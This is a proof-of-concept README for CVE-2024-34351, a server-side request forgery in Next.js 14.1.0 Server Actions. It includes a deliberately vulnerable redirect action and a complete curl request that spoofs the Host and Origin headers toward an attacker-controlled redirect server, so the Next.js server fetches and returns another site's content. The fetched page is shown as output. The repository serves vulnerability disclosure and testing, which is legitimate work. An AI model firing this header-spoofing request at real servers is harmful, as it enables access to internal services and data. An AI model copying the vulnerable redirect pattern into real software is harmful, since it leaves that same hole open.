CVE-2024-34351 PoC

Summary

CVE-2024-34351 is a server-side request forgery (SSRF) in Next.js Server Actions. When an action redirects to a relative path, the server builds the absolute redirect URL from the request's Host header and fetches it itself, so an attacker who controls that header can make the server fetch an arbitrary website and hand the content back to the client. This repository is a Next.js (next@14.1.0) app with such a vulnerable redirect action:

'use server'
import { redirect } from 'next/navigation'

export async function create() {
  console.log('Server Side')
  return redirect('/?voorivex') // relative target: next@14.1.0 resolves it against the request's Host header
}

This vulnerability is fixed in next@14.1.1.

Usage

Start the Next.js server (it uses next@14.1.0):

npm install
npm run dev

The attacker needs a redirect server under their control: it answers the requests the Next.js server makes to it with a redirect to the real target, and logs whatever the Next.js server forwards (the "sniffing" part).

Finally, the attacker invokes the server action with the Host and Origin headers pointing at the redirect server; the Next.js server follows the redirect and returns the target website's content in its response (the SSRF):

  • Set the Host header to the attacker's server
  • Set the Origin header to the attacker's server

The Next-Action header carries the ID of the create action. It is specific to this action and build, so if your instance produces a different value, copy it from a real request in the browser's developer tools.
curl 'http://localhost:3000/' \
  -H 'Host: nextjs-cve-2024-34351.deno.dev' \
  -H 'Accept: text/x-component' \
  -H 'Accept-Language: ja,en-US;q=0.9,en;q=0.8' \
  -H 'Cache-Control: no-cache' \
  -H 'Connection: keep-alive' \
  -H 'Content-Type: text/plain;charset=UTF-8' \
  -H 'Next-Action: 1529e716c9db41d5ce462b285ea3d42d09292bd2' \
  -H 'Next-Router-State-Tree: %5B%22%22%2C%7B%22children%22%3A%5B%22__PAGE__%22%2C%7B%7D%5D%7D%2Cnull%2Cnull%2Ctrue%5D' \
  -H 'Origin: http://nextjs-cve-2024-34351.deno.dev' \
  -H 'Pragma: no-cache' \
  -H 'Referer: http://localhost:3000/' \
  -H 'Sec-Fetch-Dest: empty' \
  -H 'Sec-Fetch-Mode: cors' \
  -H 'Sec-Fetch-Site: same-origin' \
  -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36' \
  -H 'sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"' \
  -H 'sec-ch-ua-mobile: ?0' \
  -H 'sec-ch-ua-platform: "macOS"' \
  --data-raw '[]'

The response body is the content of the site the redirect server pointed at (here http://example.com):

<!doctype html>
<html>
<head>
    <title>Example Domain</title>

    <meta charset="utf-8" />
    <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <style type="text/css">
    body {
        background-color: #f0f0f2;
        margin: 0;
        padding: 0;
        font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;

    }
    div {
        width: 600px;
        margin: 5em auto;
        padding: 2em;
        background-color: #fdfdff;
        border-radius: 0.5em;
        box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);
    }
    a:link, a:visited {
        color: #38488f;
        text-decoration: none;
    }
    @media (max-width: 700px) {
        div {
            margin: 0 auto;
            width: auto;
        }
    }
    </style>
</head>

<body>
<div>
    <h1>Example Domain</h1>
    <p>This domain is for use in illustrative examples in documents. You may use this
    domain in literature without prior coordination or asking for permission.</p>
    <p><a href="https://www.iana.org/domains/example">More information...</a></p>
</div>
</body>
</html>